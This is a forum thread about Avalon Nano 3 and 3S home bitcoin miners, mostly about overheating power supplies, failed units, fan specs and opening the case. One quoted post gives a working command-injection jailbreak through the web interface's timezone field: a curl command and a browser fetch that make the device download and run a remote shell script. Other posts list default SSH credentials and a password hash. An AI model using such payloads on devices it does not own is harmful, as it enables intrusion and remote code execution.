botor123
Newbie

Activity: 20
Merit: 3
|
 |
June 24, 2025, 01:57:27 AM |
|
same problems here.-melted usb cables and burnt power supplies. I think they are not calculated very well and should be used in LOW or MIDDLE mode.
|
|
|
|
|
LimaPT
Newbie

Activity: 2
Merit: 0
|
 |
June 24, 2025, 01:41:16 PM |
|
seen some people on-line, upgrading psu unit too an Dell USB-C 165w , and they are happy , i´m on process of doing an STL , to make an "stand" with 120mm fan on the back , too cool down chager and asic
|
|
|
|
|
ovydyu1985
Newbie

Activity: 4
Merit: 0
|
 |
July 04, 2025, 10:50:31 AM |
|
can somene help me with this file Avalon_Nano3_2024123018_a312f9b.kdimg.gz?
|
|
|
|
|
lipo135
Newbie

Activity: 2
Merit: 2
|
 |
August 04, 2025, 08:22:26 PM Last edit: August 05, 2025, 02:39:11 PM by lipo135 Merited by NotFuzzyWarm (1), hawer357 (1) |
|
for nano3s use 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 after that should work. Hey, could you provide a bit more details on exploiting the Nano 3S? Its web UI is quite different from the Nano 3, so the timezone hack isn't applicable here. On Nano3s you do not have to run any exploit. Firmware version 25021401_56abae7 have ssh username "avalon" and password "avalon"  Found on github btw  edit: sorry for the mystification - the firmware "2025012001_21e0e59" posted on github has root enabled, but "2025021401_56abae7" and "2025061101_4ba23e3" already have root access disabled
|
|
|
|
|
i4n0rd
Newbie

Activity: 1
Merit: 0
|
 |
September 29, 2025, 08:34:16 PM Last edit: September 29, 2025, 11:04:20 PM by i4n0rd |
|
On Nano3s you do not have to run any exploit. Firmware version 25021401_56abae7 have ssh username "avalon" and password "avalon Mhmm  might be stupid but you can't do anything with that user... **edit** at least some logs can be read under /data/userdata/log I'm on 25021401_56abae7 with my Nano3s passwd: avalon can't change password for root -sh: cd: can't cd to mnt: Permission denied -sh: cd: can't cd to mntapp: Permission denied #top top: can't change directory to '/proc': Permission denied So we still need some exploit to get elevated rights/change root pwd or am I wrong? Cheers! PS: Are there any changelogs what has been done (except disabling root) from 25021401 to 2025021401 & 2025061101? Is there any benefit in buidling one yourself from https://github.com/Canaan-Creative/Avalon_Nano3s/?
|
|
|
|
|
itsabeardance
Newbie

Activity: 9
Merit: 0
|
 |
October 02, 2025, 12:56:18 PM |
|
Is there any sense (or perhaps danger) in adding heatsinks to the PSUs that get absurdly hot on these guys?
|
|
|
|
|
|
simpic
|
 |
October 13, 2025, 01:37:15 PM |
|
The function that calls set_timezone uses a small 64-byte buffer to store the timezone (of course with no boundary checks!), so we cannot fit in there a whole ass jailbreak script. However, it is enough to fit a small script that fetches the true jailbreak from the internet. If you haven't changed the original password on the device (root), this cURL call will trigger a fetch to https://xn--i29h.ge/n.sh, then execute it: curl 'http://<miner IP>/timezoneconf.cgi' \ -b 'auth=ff0000ff4813494d137e1631bba301d5' \ --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B' Alternatively, you can also trigger it from your web browser's JavaScript console. Just log into your device, then paste: await fetch("/timezoneconf.cgi", { "body": "timezone=" + encodeURIComponent(";wget http://xn--i29h.ge/n.sh -O-|sh;"), "method": "POST" });The payload has comments, so feel free to check it, but it: - Changes the admin user password to admin. The original password hash is $5$1N6rEpvUXco$0QAASdP5iZRPWxgmAZQkTC0FM8GGw6L7HnprqT7Ll72 which I've not cracked.
- Generates a new ED25519 host key.
- Creates the jail environment the SSH daemon expects.
- Configures SSH as a init service.
- Launches the SSH service, so you don't have to reboot.
After running the command, you should be able to connect via SSH. Once SSH works, remember to configure again the correct timezone! I have tried both using curl and JS console in the browser but my Nano 3 keeps refusing connection on port 22. I also tried to reboot and relaunch the commands, but they don't work. My firmware version is the following: 24071801_42c628d. What's wrong?
|
|
|
|
|
simpic
|
 |
October 14, 2025, 02:59:44 PM |
|
I have tried both using curl and JS console in the browser but my Nano 3 keeps refusing connection on port 22. I also tried to reboot and relaunch the commands, but they don't work. My firmware version is the following: 24071801_42c628d.
What's wrong?
I solved it by running the shell script commands step by step, serving it from my computer in the same network.
|
|
|
|
whoismeanyway
Jr. Member

Activity: 36
Merit: 3
|
 |
February 06, 2026, 02:36:21 PM |
|
I am quitting Avalon nano. After 10-12 months they all fail. Only Bitaxe. Lower power consumption, simple adapter no confused 4.1 pdp anymore and more TH.
|
|
|
|
|
|
n0nce (OP)
|
 |
February 18, 2026, 09:04:03 AM |
|
I am quitting Avalon nano. After 10-12 months they all fail. Only Bitaxe. Lower power consumption, simple adapter no confused 4.1 pdp anymore and more TH.
Did you own multiple of them? My original one is still running today, however I don't run it 24/7 anymore. It heats my workspace in winter and is cleaned & stored safely in summer. What are the overall experiences with Nano 3S, Mini 3 and Avalon Q?
|
n0nce.eu
|
|
|
|
|
mahlf
Newbie
Online
Activity: 3
Merit: 0
|
 |
March 23, 2026, 06:47:15 PM Last edit: April 05, 2026, 02:52:43 PM by mahlf |
|
@brontolo10
Great teardown and repair work on your Nano 3 (posts #141–#144)! Very helpful, especially the inductor fix.
I have a Nano 3 with a whining fan that needs replacing. I've removed the five bottom screws but the case is still stuck — the USB-C area seems to be blocking it, just as you warned.
Two questions: 1. What are the exact specs of the internal fans (model, dimensions, voltage, connector type)? 2. Are they plug-connected or soldered?
I also tried to PM you but your inbox doesn't accept messages from newbies. Could you either enable that or share your Telegram channel link ("Avalon Nano3 Italia") here?
Thanks! please see the next post #433
|
|
|
|
|
mahlf
Newbie
Online
Activity: 3
Merit: 0
|
 |
April 05, 2026, 12:16:07 PM Last edit: April 05, 2026, 01:38:25 PM by mahlf |
|
Hi, I have a Nano 3 directly from Canaan with a whining fan that needs replacing after 15 month.
After removing the 5 bottom screws, the top shell needs to be lifted vertically — but the USB-C port extends horizontally through the case wall, effectively locking it in place. So how is the shell supposed to come off? Can someone explain the actual mechanics of opening the Nano 3 case?
Two more questions in advance: 1. What are the exact specs of the internal fans (model, dimensions, voltage, connector type)? 2. Are they plug-connected or soldered?
Thanks!
|
|
|
|
|
btcdfghj
Newbie

Activity: 5
Merit: 1
|
 |
May 24, 2026, 04:38:48 PM |
|
1. What are the exact specs of the internal fans (model, dimensions, voltage, connector type)? 2. Are they plug-connected or soldered?
Thanks!
You can see the close up photo of the fans here: https://www.chongdiantou.com/archives/343313.htmlscroll down about two thirds of the page It says "The cooling fan is from Dongguan Honghua Electronics, model HA5020H12SF-Z, operating at 12V and current at 0.2A"
|
|
|
|
|
|
simpic
|
 |
Today at 07:58:31 AM |
|
It says "The cooling fan is from Dongguan Honghua Electronics, model HA5020H12SF-Z, operating at 12V and current at 0.2A"
Or any other 50x50x20 mm 12V fan?
|
|
|
|
mahlf
Newbie
Online
Activity: 3
Merit: 0
|
 |
Today at 08:56:06 AM |
|
Thanks for replying! So far, I have neither learned nor figured out how to even remove the casing without damaging the device. However: The Nano 3, always running on the medium setting, has now completely failed; the USB plug was stuck fast—as if glued in—and was extremely difficult to pull out. What happened here, and who can help 
|
|
|
|
|
PakoTor
Newbie

Activity: 25
Merit: 0
|
 |
Today at 03:14:39 PM |
|
Thanks for replying! So far, I have neither learned nor figured out how to even remove the casing without damaging the device. However: The Nano 3, always running on the medium setting, has now completely failed; the USB plug was stuck fast—as if glued in—and was extremely difficult to pull out. What happened here, and who can help  You need to open it like a book from the opposite side of the USB port. The twisting will make it easier to open. I bought 6 nano 3 when they were 99$. 2 years later only 2 are still running. Fixed some by replacing the 4R7 chip and made others worse with too much heat from the heat gun.
|
|
|
|
|
|